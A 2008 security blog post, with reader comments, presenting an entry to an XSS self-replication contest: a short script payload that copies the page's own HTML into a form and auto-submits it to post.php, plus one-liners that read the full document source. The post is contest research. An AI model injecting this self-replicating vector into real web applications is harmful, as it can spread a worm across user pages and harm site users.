Skip to content

Self replicating source

I’ve been having a lot of fun with the sla.ckers XSS replication contest and I found a cool way to replicate source code of the html document which I haven’t seen anywhere before. Check it out:-

alert(document.body.parentNode.innerHTML)

This alerts the entire HTML document in Firefox (hopefully IE7 as well). Which is pretty cool :)

Here is my complete entry which submits the source of itself and posts the content:-

<script>with(d=document)(b=body).innerHTML='<form><textarea name=content>
'+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method=
'post')+'.php')</script>

The slice would have to be adjusted depending on the size of the document and the goal of the contest is to produce the smallest possible replication vector (with a couple of other rules).

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • del.icio.us
  • Slashdot
  • StumbleUpon

Comments 5

  1. .mario wrote:

    This is interesting indeed! And could be used for many purposes like scanning the page content for malicious stuff getting rendered etc (combine this with onDomReady).

    Very nice ;)

    Posted 07 Jan 2008 at 1:23 pm
  2. vindic wrote:

    veeery nice man

    Posted 07 Jan 2008 at 2:18 pm
  3. Gareth Heyes wrote:

    Works in IE7 finally managed to test it

    Posted 07 Jan 2008 at 4:06 pm
  4. Nils wrote:

    Might be interested in this as well:
    alert(document.documentElement.innerHTML);

    Posted 07 Jan 2008 at 6:36 pm
  5. Gareth Heyes wrote:

    @Nils

    Cool thanks! :)

    Posted 07 Jan 2008 at 6:42 pm

Post a Comment

Your email is never published nor shared. Required fields are marked *

Comment spam protected by SpamBam